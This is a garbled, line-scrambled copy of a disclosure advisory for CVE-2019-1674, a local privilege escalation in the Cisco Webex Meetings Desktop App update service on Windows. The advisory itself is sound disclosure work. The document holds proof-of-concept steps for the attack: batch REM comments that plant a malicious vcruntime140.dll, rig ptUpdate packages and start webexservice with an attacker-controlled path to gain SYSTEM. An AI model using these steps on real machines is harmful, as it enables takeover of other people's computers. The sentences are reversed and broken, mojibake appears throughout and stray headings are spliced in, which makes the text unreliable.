REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml. REM After a key is pressed, the batch will finish removing atgpcdec.7z You should see a notepad.exe (2, in fact) with SYSTEM REM Once finished, it will print that the attack is done and wait for a
#CISCO WEBEX MAC M1 UPDATE#
The update service will be started again. REM execute notepad.exe on load and that has the same exported functions
REM certutil.exe and named vcruntime140.7z. Out "malicious" DLL will be generated using REM Now, ptUpdate1.xml file will be used in the second stage of the REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml. REM After the first stage is completeted, it will rename ptUpdate.7z REM The batch will wait until the process (ptUpdate.exe) finishes ptUpdate0.7z will be renamed to ptUpdate.7z. REM necessary) the "Size" and "PackagedSize" values of the xml, to the REM ptUpdate0.xml file will be used in the first stage of the attack. REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21 REM Another way is to compress both files using the command line app: REM normal compression level and LZMA compression method. REM Both can be generated using 7zip GUI and compressing as 7z, with REM compressed as ptUpdate1.7z and present in the current folder. REM The executable ptUpdate.exe version 33.1600 must be REM compressed as ptUpdate0.7z and present in the current folder. REM The executable ptUpdate.exe version 33.1500 must be REM not restored, will render the application useless. REM those files will be replaced (especially, vcruntime140.dll) and if REM ptUpdate.exe and vcruntime140.dll files from the installation folder REM folder to the current folder as atgpcdec.7z. REM First, it will copy the atgpcdec.dll file from the installation REM This batch file will exploit CVE-2019-1674 To exploit version priot to 33.8.X, only one step is required Those versions are:ģ3.1500 for the first step and 33.1600 for the last The following proof of concept performs a 2 step attack, since startingįrom version 33.8.X, the application enforces the checking of signaturesįor all the downloaded binaries. Sc start webexservice WebexService 1 989898 "attacker-controlled-path" To gain privileges, the attacker must start Finally, a ptUpdate.xml file must be provided in theĬontroller folder for the update binary (ptUpdate.exe) to treat ourįiles as a normal update. Placed in the same folder, named vcruntime140.dll and compressed as Then, a previous version of the ptUpdate.exe file must be compressed asħz and copied to the controller folder. The vulnerability can be exploited by copying to a local attackerĬontroller folder, the atgpcdec.dll binary and rename it as atgpcdec.7z. This will allow theĪttacker to run arbitrary commands with SYSTEM user privileges. Service command with a crafted argument and folder. Local attacker could exploit this vulnerability by invoking the update Not properly validate version numbers of new files.
#CISCO WEBEX MAC M1 WINDOWS#
The update service of Cisco Webex Meetings Desktop App for Windows does *Technical Description / Proof of Concept Code* Leandro Cuozzo from SecureAuth Advisories Team.ħ. The publication of this advisory was coordinated by This vulnerability was discovered and researched by Marcos Accossattoįrom SecureAuth. In addition, Cisco published the following advisory: Meetings Desktop App releases 33.6.6 and 33.9.1. *Vendor Information, Solutions and Workarounds*Ĭisco informed that released the vulnerability is fixed in Cisco Webex Older versions are probably affected too, but they wereĥ. Cisco Webex Meetings Desktop App v33.8.2.7 Cisco Webex Meetings Desktop App v33.8.1.13 Cisco Webex Meetings Desktop App v33.8.0.779 Cisco Webex Meetings Desktop App v33.7.3.7 Cisco Webex Meetings Desktop App v33.7.2.24 Cisco Webex Meetings Desktop App v33.7.1.15 Cisco Webex Meetings Desktop App v33.7.0.694 Cisco Webex Meetings Desktop App v33.6.5.2 Cisco Webex Meetings Desktop App v33.6.4.15 We help you forget about the technology, to focus onĪ vulnerability in the update service of Cisco Webex Meetings Desktop With Cisco Webex Meetings, joining is a breeze, audio and video areĮasier than ever. Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2Ĭisco's Webex Meetings website states that :Ĭisco Webex Meetings: Simply the Best Video Conferencing and Online Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
0 kommentar(er)
